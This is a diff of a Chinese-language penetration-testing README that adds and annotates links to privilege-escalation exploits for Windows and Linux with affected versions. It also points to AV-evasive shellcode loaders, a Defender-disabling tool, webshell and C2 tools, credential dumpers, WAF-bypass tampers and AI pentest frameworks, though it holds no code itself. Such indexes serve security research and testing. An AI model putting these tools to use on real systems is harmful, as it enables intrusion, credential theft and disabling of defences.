+- [【Windows提权】wesng-Windows提权辅助脚本（Windows XP - Windows 11，支持所有Server版本）](https://github.com/bitsadmin/wesng)|[Windows-Exploit-Suggester：又一个 Windows 提权辅助Python脚本](https://github.com/AonCyberLabs/Windows-Exploit-Suggester)
+- [【Windows提权】dazzleUP是一款用来帮助渗透测试人员进行权限提升的工具，可以在window系统中查找脆弱面进行攻击。工具包括两部分检查内容，exploit检查和错误配置检查。（漏洞检查：Windows 10 build 1809/1903/1909/2004；配置检查：所有Windows版本）](https://github.com/hlldz/dazzleUP)
+- [【Windows提权】KernelHub-近二十年Windows权限提升集合（Windows 2000 - 2023）](https://github.com/Ascotbe/KernelHub)
 - [【Windows提权】Priv2Admin-Windows提权工具](https://github.com/gtworek/Priv2Admin)
-- [【windows提权】利用有漏洞的技嘉驱动程序来加载恶意的驱动程序提升权限或干掉驱动级保护的杀软](https://github.com/alxbrn/gdrv-loader)|[备份地址](https://github.com/Mr-xn/gdrv-loader)
-- [【windows提权】byeintegrity-uac：通过劫持位于本机映像缓存中的DLL绕过UAC](https://github.com/AzAgarampur/byeintegrity-uac)
-- [【Windows 提权】InstallerFileTakeOver：Windows Installer 本地提权漏洞PoC](https://github.com/klinix5/InstallerFileTakeOver)
-- [【Linux 提权】CVE-2021-4034：Linux Polkit 权限提升漏洞（pkexec）](https://github.com/berdav/CVE-2021-4034)|[PwnKit：cve-2021-4034，可获得交互式shell或者执行单个命令](https://github.com/ly4k/PwnKit)|[cve-2021-4034：单命令执行版本](https://github.com/wudicainiao/cve-2021-4034)|[CVE-2021-4034-NoGCC：CVE-2021-4034简单优化，以应对没有安装gcc和make的目标环境](https://github.com/EstamelGG/CVE-2021-4034-NoGCC)
-- [【Windows 提权】CVE-2022-21882：win32k LPE bypass CVE-2021-1732](https://github.com/KaLendsi/CVE-2022-21882)|[又一个CVE-2022-21882提权工具](https://github.com/L4ys/CVE-2022-21882)
-- [【Windows 提权】CVE-2022-21999：Windows 打印机提权漏洞（此漏洞是去年打印机提权漏洞Printnightmare的续集）](https://github.com/ly4k/SpoolFool)
-- [【Windows 提权】CVE-2022-29072：7-Zip帮助页面命令注入漏洞](https://github.com/kagancapar/CVE-2022-29072)
+- [【windows提权 Windows 7/10 x64】利用有漏洞的技嘉驱动程序来加载恶意的驱动程序提升权限或干掉驱动级保护的杀软](https://github.com/alxbrn/gdrv-loader)|[备份地址](https://github.com/Mr-xn/gdrv-loader)
+- [【windows提权】byeintegrity-uac：通过劫持位于本机映像缓存中的DLL绕过UAC（Windows 7 build 7600 至最新版本）](https://github.com/AzAgarampur/byeintegrity-uac)
+- [【Windows 提权 Windows 10/11, Server 2019/2022】InstallerFileTakeOver：Windows Installer 本地提权漏洞PoC](https://github.com/klinix5/InstallerFileTakeOver)
+- [【Linux 提权】CVE-2021-4034：Linux Polkit pkexec 权限提升漏洞（所有主流Linux发行版，polkit < 0.120）](https://github.com/berdav/CVE-2021-4034)|[PwnKit：cve-2021-4034，可获得交互式shell或者执行单个命令](https://github.com/ly4k/PwnKit)|[cve-2021-4034：单命令执行版本](https://github.com/wudicainiao/cve-2021-4034)|[CVE-2021-4034-NoGCC：CVE-2021-4034简单优化，以应对没有安装gcc和make的目标环境](https://github.com/EstamelGG/CVE-2021-4034-NoGCC)
+- [【Windows 提权 Windows 10 20H2 (build 19042)】CVE-2022-21882：win32k LPE bypass CVE-2021-1732](https://github.com/KaLendsi/CVE-2022-21882)|[又一个CVE-2022-21882提权工具](https://github.com/L4ys/CVE-2022-21882)
+- [【Windows 提权】CVE-2022-21999：Windows 打印机提权漏洞，支持所有Windows桌面版本（此漏洞是去年打印机提权漏洞Printnightmare的续集）](https://github.com/ly4k/SpoolFool)
+- [【Windows 提权】CVE-2022-29072：7-Zip帮助页面命令注入漏洞（7-Zip 21.07，Windows）](https://github.com/kagancapar/CVE-2022-29072)
 - [PEASS-ng：提权检测工具，支持 Windows 和 Linux](https://github.com/carlospolop/PEASS-ng)
 - [【Linux提权】LinEnum：Linux 提权检查脚本](https://github.com/rebootuser/LinEnum)
-- [【Windows 提权】sam-the-admin：CVE-2021-42278 and CVE-2021-42287域内提权](https://github.com/WazeHell/sam-the-admin)
-- [【Windows 提权】KrbRelayUp：域内提权](https://github.com/Dec0ne/KrbRelayUp)
-- [【Windows 提权】Auto-Elevate：通过bypass UAC 和令牌模拟提权到 system权限](https://github.com/FULLSHADE/Auto-Elevate)
-- [【Linux 提权】CVE-2021-4204：Linux Kernel eBPF Local Privilege Escalation](https://github.com/tr3ee/CVE-2021-4204)
-- [【Linux 提权】CVE-2022-23222：Linux Kernel eBPF Local Privilege Escalation](https://github.com/tr3ee/CVE-2022-23222)
+- [【Windows 提权】sam-the-admin：CVE-2021-42278 and CVE-2021-42287域内提权（Active Directory域环境，2021年11月补丁前）](https://github.com/WazeHell/sam-the-admin)
+- [【Windows 提权】KrbRelayUp：域内提权（未强制LDAP签名的默认AD域环境，通用无补丁提权）](https://github.com/Dec0ne/KrbRelayUp)
+- [【Windows 提权 Windows 10 21H1】Auto-Elevate：通过bypass UAC 和令牌模拟提权到 system权限](https://github.com/FULLSHADE/Auto-Elevate)
+- [【Linux 提权】CVE-2021-4204：Linux Kernel eBPF Local Privilege Escalation（Linux kernel 5.8 - 5.16）](https://github.com/tr3ee/CVE-2021-4204)
+- [【Linux 提权】CVE-2022-23222：Linux Kernel eBPF Local Privilege Escalation（Linux kernel 5.15.0 - 5.15.20）](https://github.com/tr3ee/CVE-2022-23222)
 - [【Windows 提权】PrivExchange：通过滥用Exchange将您的权限交换为域管理权限](https://github.com/dirkjanm/PrivExchange)
-- [【Windows 提权】PetitPotam：替代PrintBug用于本地提权的新方式，主要利用MS-EFSR协议中的接口函数](https://github.com/crisprss/PetitPotam)
-- [【Windows 提权】DiagTrackEoP：绕过服务账户限制滥用DiagTrack服务与SeImpersonate权限进行权限提升](https://github.com/Wh04m1001/DiagTrackEoP)
-- [【Windows 提权】WinPwnage：UAC bypass, Elevate, Persistence methods](https://github.com/rootm0s/WinPwnage)
-- [【Windows 提权】CVE-2022-31262：GOG Galaxy LPE Exploit](https://github.com/secure-77/CVE-2022-31262)
+- [【Windows 提权】PetitPotam：替代PrintBug用于本地提权的新方式，主要利用MS-EFSR协议中的接口函数（所有Windows Server版本，需MS-EFSR服务）](https://github.com/crisprss/PetitPotam)
+- [【Windows 提权 Windows 10/Server 2019】DiagTrackEoP：绕过服务账户限制滥用DiagTrack服务与SeImpersonate权限进行权限提升](https://github.com/Wh04m1001/DiagTrackEoP)
+- [【Windows 提权】WinPwnage：UAC bypass, Elevate, Persistence methods（Windows 7 build 7600 - Windows 10，各方法支持的build范围不同）](https://github.com/rootm0s/WinPwnage)
+- [【Windows 提权】CVE-2022-31262：GOG Galaxy LPE Exploit（GOG Galaxy 2.0.46 - 2.0.51，Windows）](https://github.com/secure-77/CVE-2022-31262)
 - [【Linux】CVE-2021-4034：pkexec 本地提权漏洞](https://github.com/arthepsy/CVE-2021-4034)|[又一个cve-2021-4034](https://github.com/Silencecyber/cve-2021-4034)
-- [【Linux 提权】CVE-2021-4154：Linux Kernel 资源管理错误漏洞](https://github.com/Markakd/CVE-2021-4154)
-- [【Linux 提权】CVE-2022-34918：netfilter nf_tables 本地提权](https://github.com/veritas501/CVE-2022-34918)
-- [【Linux 提权】CVE-2022-1972-infoleak-PoC：Linux-netfilter-越界写入漏洞](https://github.com/randorisec/CVE-2022-1972-infoleak-PoC)
-- [【Linux 提权】CVE-2022-32250-exploit](https://github.com/theori-io/CVE-2022-32250-exploit)
-- [Elevator：UAC Bypass by abusing RPC and debug objects.](https://github.com/Kudaes/Elevator)
-- [【Linux 提权】CVE-2022-2639-PipeVersion](https://github.com/avboy1337/CVE-2022-2639-PipeVersion)
-- [【Linux 提权】CVE-2022-2588](https://github.com/Markakd/CVE-2022-2588)
-- [【Windows 提权】PetitPotato：通过PetitPotam进行本地提权](https://github.com/wh0Nsq/PetitPotato)
-- [LocalPotato：一个使用新potato技术来进行windows本地提权](https://github.com/decoder-it/LocalPotato)
-- [EfsPotato：Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)](https://github.com/zcgonvh/EfsPotato)
-- [【Linux 提权】CVE-2023-32233: Linux Kernel 权限提升漏洞](https://github.com/Liuk3r/CVE-2023-32233)
-- [【Linux 提权】CVE-2023-0386: Linux OverlayFS权限提升漏洞](https://github.com/veritas501/CVE-2023-0386)
-- [【Linux提权】CVE-2023-2008: Linux Kernel 权限提升漏洞](https://github.com/bluefrostsecurity/CVE-2023-2008)
-- [【win提权】CVE-2023-21752: Windows 备份服务特权提升漏洞](https://github.com/Wh04m1001/CVE-2023-21752)
-- [【win提权】CVE-2023-29343: Windows 特权提升漏洞的 SysInternals Sysmon](https://github.com/Wh04m1001/CVE-2023-29343)
-- [【Linux提权】CVE2023-1829: Linux Kernel 权限提升漏洞](https://github.com/lanleft/CVE2023-1829)
+- [【Linux 提权】CVE-2021-4154：Linux Kernel 资源管理错误漏洞（Linux kernel 5.1 - 5.16，需unprivileged user namespaces）](https://github.com/Markakd/CVE-2021-4154)
+- [【Linux 提权】CVE-2022-34918：netfilter nf_tables 本地提权（Linux kernel < 5.18.13，需unprivileged user namespaces）](https://github.com/veritas501/CVE-2022-34918)
+- [【Linux 提权】CVE-2022-1972-infoleak-PoC：Linux-netfilter-越界写入漏洞（需开启unprivileged user namespaces）](https://github.com/randorisec/CVE-2022-1972-infoleak-PoC)
+- [【Linux 提权】CVE-2022-32250-exploit（Linux kernel < 5.18.13，Ubuntu ≤ 22.04未打补丁）](https://github.com/theori-io/CVE-2022-32250-exploit)
+- [Elevator：UAC Bypass by abusing RPC and debug objects.（Windows Server 2016/2019, Windows 10/11 x64，build 19045.3570前）](https://github.com/Kudaes/Elevator)
+- [【Linux 提权】CVE-2022-2639-PipeVersion（Linux kernel 3.13 - 5.17）](https://github.com/avboy1337/CVE-2022-2639-PipeVersion)
+- [【Linux 提权】CVE-2022-2588（Linux kernel 3.17 - 5.18，需user namespaces）](https://github.com/Markakd/CVE-2022-2588)
+- [【Windows 提权】PetitPotato：通过PetitPotam进行本地提权（支持所有Windows版本，含Server 2022 21H2）](https://github.com/wh0Nsq/PetitPotato)
+- [LocalPotato（CVE-2023-21746）：一个使用新potato技术来进行Windows本地提权（Windows 10/11, Server 2019/2022；HTTP/WebDAV场景在打补丁后仍可用）](https://github.com/decoder-it/LocalPotato)
+- [EfsPotato：Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)（适用于具有SeImpersonatePrivilege权限的Windows环境）](https://github.com/zcgonvh/EfsPotato)
+- [【Linux 提权】CVE-2023-32233: Linux Kernel 权限提升漏洞（Linux kernel < 6.3.1，测试于Ubuntu 23.04 kernel 6.2.0-20-generic）](https://github.com/Liuk3r/CVE-2023-32233)
+- [【Linux 提权】CVE-2023-0386: Linux OverlayFS权限提升漏洞（Linux kernel < 6.2）](https://github.com/veritas501/CVE-2023-0386)
+- [【Linux提权】CVE-2023-2008: Linux Kernel 权限提升漏洞（Linux kernel < 5.19-rc4，Ubuntu 22.04，需kvm组权限）](https://github.com/bluefrostsecurity/CVE-2023-2008)
+- [【win提权】CVE-2023-21752: Windows 备份服务特权提升漏洞（Windows，2023年1月补丁前）](https://github.com/Wh04m1001/CVE-2023-21752)
+- [【win提权】CVE-2023-29343: Windows 特权提升漏洞的 SysInternals Sysmon（Sysmon v14.14，2023年4月补丁前）](https://github.com/Wh04m1001/CVE-2023-29343)
+- [【Linux提权】CVE2023-1829: Linux Kernel 权限提升漏洞（Linux kernel 5.15，测试于Ubuntu 22.04 kernel 5.15.0-25.25）](https://github.com/lanleft/CVE2023-1829)
+- [【Windows提权 Windows 10/11, Server 2019/2022（含Defender）】RedSun：滥用Windows Defender云标签行为覆盖系统文件并获得管理员权限](https://github.com/Nightmare-Eclipse/RedSun)
+- [【Windows Defender DOS】UnDefend：无需管理员权限，被动模式下阻止Defender签名更新，激进模式下在Windows平台更新时完全禁用Windows Defender](https://github.com/Nightmare-Eclipse/UnDefend)
+- [【Windows提权】CVE-2026-0827：Lenovo LdeApi.Server.exe 无模拟写文件本地提权漏洞——低权限用户可创建 NTFS junction 使服务以 SYSTEM 权限向任意位置写文件](https://github.com/ZeroMemoryEx/CVE-2026-0827)
+- [【Linux提权】CVE-2026-31431：Linux Copy Fail提权](https://github.com/theori-io/copy-fail-CVE-2026-31431) | [CVE-2026-31431](https://github.com/rootsecdev/cve_2026_31431) | [Copy-Fail-CVE-2026-31431-Kubernetes-PoC](https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kubernetes-PoC)
+- [【Linux提权】Dirty Frag：Universal Linux LPE（CVE-2026-43284 / CVE-2026-43500，影响主流 Linux 发行版）](https://github.com/V4bel/dirtyfrag)
+- [【Linux提权】CIFSwitch：利用 cifs.upcall 与 NSS 加载链进行本地提权 PoC](https://github.com/manizada/CIFSwitch)
+- [CACM：一款Linux权限维持+后渗透工具，功能涵盖端口扫描、敏感信息、指纹识别、IP伪装、键盘监控、进程隐藏、edr/av识别、权限维持、docker敏感信息扫描、ssh连接伪装等](https://github.com/RuoJi6/CACM)
 
 ## <span id="head6"> PC</span>
 
@@ -871,11 +971,11 @@
 
 - [CVE-2020-0674: Internet Explorer远程代码执行漏洞检测](https://github.com/binaryfigments/CVE-2020-0674)
 
-- [CVE-2020-8794: OpenSMTPD 远程命令执行漏洞](./CVE-2020-8794-OpenSMTPD%20远程命令执行漏洞.md)
+- [CVE-2020-8794: OpenSMTPD 远程命令执行漏洞](./web/CVE-2020-8794-OpenSMTPD%20远程命令执行漏洞.md)
 
 - [Linux平台-CVE-2020-8597: PPPD 远程代码执行漏洞](https://github.com/marcinguy/CVE-2020-8597)
 
-- [Windows-CVE-2020-0796：疑似微软SMBv3协议“蠕虫级”漏洞](https://cert.360.cn/warning/detail?id=04f6a686db24fcfa478498f55f3b79ef)|[相关讨论](https://linustechtips.com/main/topic/1163724-smbv3-remote-code-execution-cve-2020-0796/)|[CVE-2020–0796检测与修复](CVE-2020-0796检测与修复.md)|[又一个CVE-2020-0796的检测工具-可导致目标系统崩溃重启](https://github.com/eerykitty/CVE-2020-0796-PoC)
+- [Windows-CVE-2020-0796：疑似微软SMBv3协议“蠕虫级”漏洞](https://cert.360.cn/warning/detail?id=04f6a686db24fcfa478498f55f3b79ef)|[相关讨论](https://linustechtips.com/main/topic/1163724-smbv3-remote-code-execution-cve-2020-0796/)|[CVE-2020–0796检测与修复](./pc/CVE-2020-0796检测与修复.md)|[又一个CVE-2020-0796的检测工具-可导致目标系统崩溃重启](https://github.com/eerykitty/CVE-2020-0796-PoC)
 
 - [WinRAR 代码执行漏洞 (CVE-2018-20250)-POC](https://github.com/Ridter/acefile)|[相关文章](https://research.checkpoint.com/2019/extracting-code-execution-from-winrar/)|[全网筛查 WinRAR 代码执行漏洞 (CVE-2018-20250)](https://xlab.tencent.com/cn/2019/02/22/investigating-winrar-code-execution-vulnerability-cve-2018-20250-at-internet-scale/)
 
@@ -931,9 +1031,9 @@
 
 - [【Linux提权】CVE-2021-3560 Local PrivEsc Exploit](https://github.com/swapravo/polkadots)|[CVE-2021-3560-Authentication-Agent](https://github.com/RicterZ/CVE-2021-3560-Authentication-Agent)
 
-- [【windows提权】CVE-2021-1675 Windows Print Spooler远程代码执行漏洞](./CVE-2021-1675.md)
+- [【windows提权】CVE-2021-1675 Windows Print Spooler远程代码执行漏洞](./privesc/CVE-2021-1675.md)
 
-- [【Linux提权】CVE-2021-22555: Linux Netfilter本地权限提升漏洞](./CVE-2021-22555.md)
+- [【Linux提权】CVE-2021-22555: Linux Netfilter本地权限提升漏洞](./privesc/CVE-2021-22555.md)
 
 - [【Linux提权】CVE-2021-33909：Linux kernel 本地提权漏洞](https://github.com/Liang2580/CVE-2021-33909)
 
@@ -941,7 +1041,7 @@
 
 - [【Linux提权】CVE-2021-3490：Linux kernel 缓冲区错误漏洞](https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490)
 
-- [【Linux 提权】CVE-2022-2602: Linux io_uring子系统UAF漏洞漏洞利用POC,可用于本地提权](https://github.com/LukeGix/CVE-2022-2602)
+- [【Linux 提权】CVE-2022-2602: Linux io_uring子系统UAF漏洞漏洞利用POC,可用于本地提权](https://github.com/LukeGix/CVE-2022-2602)|[CVE-2022-2602-Kernel-Exploit：另一个io_uring UAF内核提权利用](https://github.com/kiks7/CVE-2022-2602-Kernel-Exploit)
 
 - [CVE-2021-34473：Microsoft Exchange Server Remote Code Execution](https://github.com/phamphuqui1998/CVE-2021-34473)|[proxyshell-auto：自动化的ProxyShell漏洞利用](https://github.com/Udyz/proxyshell-auto)
 
@@ -1045,15 +1145,28 @@
 
 - [CVE-2023-27363: Foxit PDF Reader及Editor任意代码执行漏洞](https://github.com/j00sean/SecBugs/tree/main/CVEs/CVE-2023-27363)
 
+- [CVE-2026-34621：Adobe Acrobat Reader 原型污染与JS注入利用链（CVE-2026-34621/34622/34626），可实现沙箱内特权JS执行及本地文件读取外带](https://github.com/azefzafyoussef/CVE-2026-34621)
+
 - [keepass-password-dumper: CVE-2023-32784 KeePass 信息泄露漏洞](https://github.com/vdohney/keepass-password-dumper)
   
 - [百度网盘（7.59.5.104） Windows客户端存在命令注入漏洞](https://mrxn.net/news/baidupan-windows-client-rce.html)
 
+- [【Linux提权】CVE-2026-31431：Copy Fail Linux内核页缓存权限提升漏洞（影响2017年后几乎所有发行版）](https://github.com/theori-io/copy-fail-CVE-2026-31431) | [Copy-Fail-CVE-2026-31431-Kubernetes-PoC](https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Kubernetes-PoC)
+
+- [【Linux提权】CVE-2026-43284/CVE-2026-43500：Dirty Frag Linux内核页缓存写漏洞](https://github.com/Percivalll/Dirty-Frag-Kubernetes-PoC)|[dirty-frag-check：漏洞检测工具](https://github.com/haydenjames/dirty-frag-check)
+
+- [【Linux提权】CVE-2026-46300：Fragnesia Linux内核提权漏洞](https://github.com/Sentebale/CVE-2026-46300)|[另一个CVE-2026-46300利用](https://github.com/0xBlackash/CVE-2026-46300)
+
 
 
 
 ## <span id="head7"> tools-小工具集版本合</span>
 
+- [RAPTOR（递归自主渗透测试与观测机器人）：基于 Claude Code 的自主攻防安全研究框架，可自动完成代码攻击面分析、Semgrep/CodeQL 漏洞扫描、AFL 模糊测试、漏洞分析与 PoC 生成、自动补丁修复及结构化报告输出的全流程渗透测试](https://github.com/gadievron/raptor)
+- [Pentest-Swarm-AI：基于多智能体协作的自动化渗透测试框架](https://github.com/Armur-Ai/Pentest-Swarm-AI)
+- [anything-analyzer：全场景抓包 + AI 自动分析工具，支持网页/桌面应用/终端/脚本/手机/IoT 等所有来源流量统一汇入同一 Session，一键生成协议逆向/安全审计/JS 加密逆向报告，并内置 MCP Server 可被 Claude Desktop、Cursor 等直接调用](https://github.com/Mouseww/anything-analyzer)
+- [nano-analyzer：基于 LLM 的轻量级零日漏洞扫描器，通过三阶段 AI 流水线（上下文生成→漏洞扫描→怀疑性分类）对源代码进行安全审计](https://github.com/weareaisle/nano-analyzer)
+- [Payloader：中英双语的交互式安全载荷参考平台，涵盖 Web 应用安全与内网渗透，包含 300+ 条精心编排的攻防载荷、攻击链可视化、工具命令集（Nmap/SQLMap/Burp/Metasploit）和编解码工具](https://github.com/3516634930/Payloader)
 - [java环境下任意文件下载情况自动化读取源码的小工具](https://github.com/Artemis1029/Java_xmlhack)
 - [Linux SSH登录日志清除/伪造](./tools/ssh)
 - [python2的socks代理](./tools/s5.py)
@@ -1083,9 +1196,11 @@
 - [sqlmap_bypass_空格替换成换行符-某企业建站程序过滤_tamper](./tools/sqlmap_bypass_空格替换成换行符-某企业建站程序过滤_tamper.py)
 - [sqlmap_bypass_云锁_tamper](./tools/sqlmap_bypass_云锁_tamper.py)
 - [sqlmap bypass云锁tamper（利用云锁的注释不拦截缺陷，来自t00ls师傅）](https://github.com/Hsly-Alexsel/Bypass)-[t00ls原文地址](https://www.t00ls.net/thread-57788-1-1.html)|[项目留存PDF版本](./books/10种方法绕过云锁以及tamper.pdf)
+- [ByPassTamperPlus：针对SQLMap开发的加强版Tamper脚本集合，通过利用特定数据库版本特性和高级混淆技术绕过现代WAF防护，支持MSSQL、MySQL和Oracle](https://github.com/Tas9er/ByPassTamperPlus)
 - [masscan+nmap扫描脚本](./tools/masscan%2Bnmap.py)
 - [PHP解密扩展](https://github.com/Albert-Zhan/php-decrypt)
 - [linux信息收集/应急响应/常见后门检测脚本](https://github.com/al0ne/LinuxCheck)
+- [ProcIR-Windows 应急响应进程排查工具，面向安全工程师的一键式应急响应工具，快速定位木马、后门、持久化、白加黑、内存注入等威胁](https://github.com/dogadmin/ProcIR)
 - [RdpThief-从远程桌面客户端提取明文凭据辅助工具](https://github.com/0x09AL/RdpThief)
 - [使用powershell或CMD直接运行命令反弹shell](https://github.com/ZHacker13/ReverseTCPShell)
 - [GitHack-.git泄露利用脚本](https://github.com/lijiejie/GitHack)
@@ -1105,7 +1220,7 @@
 - [内网常见渗透工具包](https://github.com/yuxiaokui/Intranet-Penetration)
 - [从内存中加载 SHELLCODE bypass AV查杀](https://github.com/brimstone/go-shellcode)|[twitter示例](https://twitter.com/jas502n/status/1213847002947051521)
 - [流量转发工具-pingtunnel是把tcp/udp/sock5流量伪装成icmp流量进行转发的工具](https://github.com/esrrhs/pingtunnel)
-- [内网渗透-创建Windows用户(当net net1 等常见命令被过滤时,一个文件执行直接添加一个管理员【需要shell具有管理员权限l】](https://github.com/newsoft/adduser)|[adduser使用方法](./adduser添加用户.md) |[【windows】绕过杀软添加管理员用户的两种方法](https://github.com/lengjibo/RedTeamTools/tree/master/windows/bypass360%E5%8A%A0%E7%94%A8%E6%88%B7)|[【windows】使用vbs脚本添加管理员用户](./使用vbs脚本添加管理员用户.md)
+- [内网渗透-创建Windows用户(当net net1 等常见命令被过滤时,一个文件执行直接添加一个管理员【需要shell具有管理员权限l】](https://github.com/newsoft/adduser)|[adduser使用方法](./privesc/adduser添加用户.md) |[【windows】绕过杀软添加管理员用户的两种方法](https://github.com/lengjibo/RedTeamTools/tree/master/windows/bypass360%E5%8A%A0%E7%94%A8%E6%88%B7)|[【windows】使用vbs脚本添加管理员用户](./privesc/使用vbs脚本添加管理员用户.md)
 - [NetUser-使用windows　api添加用户，可用于net无法使用时（支持Nim版本）](https://github.com/lengjibo/NetUser)
 - [pypykatz-通过python3实现完整的Mimikatz功能(python3.6+)](https://github.com/skelsec/pypykatz)
 - [【windows】Bypassing AV via in-memory PE execution-通过在内存中加载多次XOR后的payload来bypass杀软](https://blog.dylan.codes/bypassing-av-via/)|[作者自建gitlab地址](https://git.dylan.codes/batman/darkarmour)
@@ -1175,7 +1290,7 @@
 - [【Android 移动app渗透】之一键提取APP敏感信息](https://github.com/TheKingOfDuck/ApkAnalyser)
 - [【android 移动app渗透】apkleaks-扫描APK文件提取URL、终端和secret](https://github.com/dwisiswant0/apkleaks)
 - [ShiroExploit-Deprecated-Shiro系列漏洞检测GUI版本-ShiroExploit GUI版本](https://github.com/feihong-cs/ShiroExploit-Deprecated)
-- [通过phpinfo获取cookie突破httponly](./通过phpinfo获取cookie突破httponly.md)
+- [通过phpinfo获取cookie突破httponly](./web/通过phpinfo获取cookie突破httponly.md)
 - [phpstudy RCE 利用工具 windows GUI版本](https://github.com/aimorc/phpstudyrce)
 - [WebAliveScan-根据端口快速扫描存活的WEB](https://github.com/broken5/WebAliveScan)
 - [bscan-bscan的是一款强大、简单、实用、高效的HTTP扫描器。（WebAliveScan的升级版本）](https://github.com/broken5/bscan)
@@ -1565,7 +1680,7 @@
 - [Sec-Tools：一款基于Python-Django的多功能Web安全渗透测试工具，包含漏洞扫描，端口扫描，指纹识别，目录扫描，旁站扫描，域名扫描等功能](https://github.com/jwt1399/Sec-Tools)
 - [Fvuln：漏洞批量扫描集合工具(闭源)](https://github.com/d3ckx1/Fvuln)
 - [MySQL_Fake_Server：用于渗透测试过程中的假MySQL服务器，纯原生python3实现，不依赖其它包](https://github.com/fnmsd/MySQL_Fake_Server)
-- [ysomap：一款适配于各类实际复杂环境的Java反序列化利用框架，可动态配置具备不同执行效果的Java反序列化利用链payload，以应对不同场景下的反序列化利用](https://github.com/wh1t3p1g/ysomap)
+- [ysomap：一款适配于各类实际复杂环境的Java反序列化利用框架，可动态配置具备不同执行效果的Java反序列化利用链payload，以应对不同场景下的反序列化利用](https://github.com/wh1t3p1g/ysomap)|[ysogate：Java反序列化利用工具，集成多种利用链和绕过方式](https://github.com/H4cking2theGate/ysogate)
 - [CobaltStrike_CNA：使用多种WinAPI进行权限维持的CobaltStrike脚本，包含API设置系统服务，设置计划任务，管理用户等(CVE-2020-0796+CVE-2020-0787)](https://github.com/yanghaoi/CobaltStrike_CNA)
 - [webshell-bypassed-human：过人 webshell 的生成工具](https://github.com/Macr0phag3/webshell-bypassed-human)
 - [BlueShell：一个Go语言编写的持续远控工具，拿下靶机后，根据操作系统版本下载部署对应的bsClient，其会每隔固定时间向指定的C&C地址发起反弹连接尝试，在C&C端运行bsServer即可连接bsClient，从而实现对靶机的持续控制](https://github.com/whitehatnote/BlueShell)
@@ -1669,6 +1784,7 @@
 - [AgentInjectTool：改造BeichenDream/InjectJDBC加入shiro获取key和修改key功能](https://github.com/SummerSec/AgentInjectTool)
 - [ByPassBehinder4J：冰蝎Java WebShell免杀生成](https://github.com/Tas9er/ByPassBehinder4J)
 - [ecapture：通过 hook ebpf 技术，无需CA证书，进行HTTPS的明文通讯抓包、bash 命令捕获和 MySQL query 等数据库审计](https://github.com/ehids/ecapture)
+- [Wireshark-MCP：基于 MCP Server 将 tshark 转化为结构化分析接口，让 AI 助手直接分析 pcap 数据包文件，支持 Claude Desktop、Cursor 等 MCP 兼容客户端](https://github.com/bx33661/Wireshark-MCP)
 - [udpme：从协议层面借助 EDNS0 过滤掉有问题的 UDP 报文](https://github.com/IrineSistiana/udpme)
 - [FirmWire：支持三星和联发科的全系统基带固件分析平台](https://github.com/FirmWire/FirmWire)
 - [apache-afl：使用 AFL++ 对 Apache httpd 进行 Fuzz 的自动化配置](https://github.com/0xbigshaq/apache-afl)
@@ -1692,6 +1808,7 @@
 - [tetanus：用 rust 开发的一款针对 Windows 和Linux 的 C2 工具](https://github.com/MythicAgents/tetanus)
 - [mortar：可有效规避安全产品的检测 shellcode 加载器](https://github.com/0xsp-SRD/mortar)
 - [go-mitmproxy：用 Golang 实现的中间人攻击，解析、监测、篡改 HTTP/HTTPS 流量](https://github.com/lqqyt2423/go-mitmproxy)
+- [Rockxy：macOS 开源 HTTP 调试代理工具，支持拦截 HTTP/HTTPS 流量、检查 API 请求、调试 WebSocket 连接及分析 GraphQL 查询，基于 Swift/SwiftNIO 构建](https://github.com/LocNguyenHuu/Rockxy)
 - [dll_inject_vs_binaries：将 dll 注入指定进程](https://github.com/mrd0x/dll_inject_vs_binaries)
 - [go4Hacker：golang 编写支持 DNSLOG、HTTPLOG、Rebinding和多用户的工具，支持 docker 一键部署](https://github.com/hktalent/go4Hacker)
 - [GetMail：利用NTLM Hash读取Exchange邮件](https://github.com/b0bac/GetMail)
@@ -1822,6 +1939,7 @@
 - [python-shellcode-loader：python免杀shellcode加载器 加密混淆](https://github.com/HZzz2/python-shellcode-loader)
 - [go-shellcode-loader：GO免杀shellcode加载器混淆AES加密](https://github.com/HZzz2/go-shellcode-loader)
 - [ThinkphpGUI：Thinkphp(GUI)漏洞利用工具，支持各版本TP漏洞检测，命令执行，getshell和日志泄露检查](https://github.com/Lotus6/ThinkphpGUI)
+- [ThinkPHPGUI：使用JavaFX编写的ThinkPHP的GUI漏洞检测利用工具](https://github.com/AgonySec/ThinkPHPGUI)
 - [webprobe：一款快速探测web存活并获取title的工具](https://github.com/damit5/webprobe)
 - [CHAOS：开源远控管理工具](https://github.com/tiagorlampert/CHAOS)
 - [gitdorks_go：一款在github上发现敏感信息的自动化收集工具](https://github.com/damit5/gitdorks_go)
@@ -1942,6 +2060,7 @@
 - [wsMemShell：一种全新的内存马](https://github.com/veo/wsMemShell)
 - [WeblogicExploit-GUI：Weblogic漏洞利用图形化工具 支持注入内存马、一键上传webshell、命令执行](https://github.com/sp4zcmd/WeblogicExploit-GUI)
 - [BOF-RegSave：使用BOF转储 SAM / SECURITY / SYSTEM 注册表配置单元](https://github.com/EncodeGroup/BOF-RegSave)
+- [BlueSAM：BlueHammer 的 Cobalt Strike BOF 移植版，通过 Windows Defender 更新/VSS 行为获取 SAM 数据库副本并在 Beacon 中离线解析注册表](https://github.com/incursi0n/BlueSAM)
 - [SharpToken：.NET版本的incognito，具有以下功能：枚举Token、从指定进程枚举Token、获得交互式shell、获取命令执行结果(webshell下执行)](https://github.com/BeichenDream/SharpToken)
 - [qsocks：基于 quic 的 socks5代理工具](https://github.com/net-byte/qsocks)
 - [CallStackSpoofer：用于在进行系统调用时欺骗任意调用堆栈的 PoC 实现（例如，通过 NtOpenProcess 获取句柄）](https://github.com/countercept/CallStackSpoofer)
@@ -2126,6 +2245,7 @@
 - [go-memorydll：内存 dll 的 go 包装器](https://github.com/nkbai/go-memorydll)
 - [SQLJam：一个探索数据库查询新方法的 jam 项目](https://github.com/bvisness/SQLJam)
 - [Webpackfind：类似Packer-Fuzzer的Webpack自动化信息收集工具](https://github.com/xz-zone/Webpackfind)
+- [Webpack_extract：自动化收集js、自动化加载js、自动化分析js的Chrome插件](https://github.com/xz-zone/Webpack_extract)
 - [estk：查询和备份各种 Elasticsearch 和 Kibana 版本的数据工具](https://github.com/LeakIX/estk)
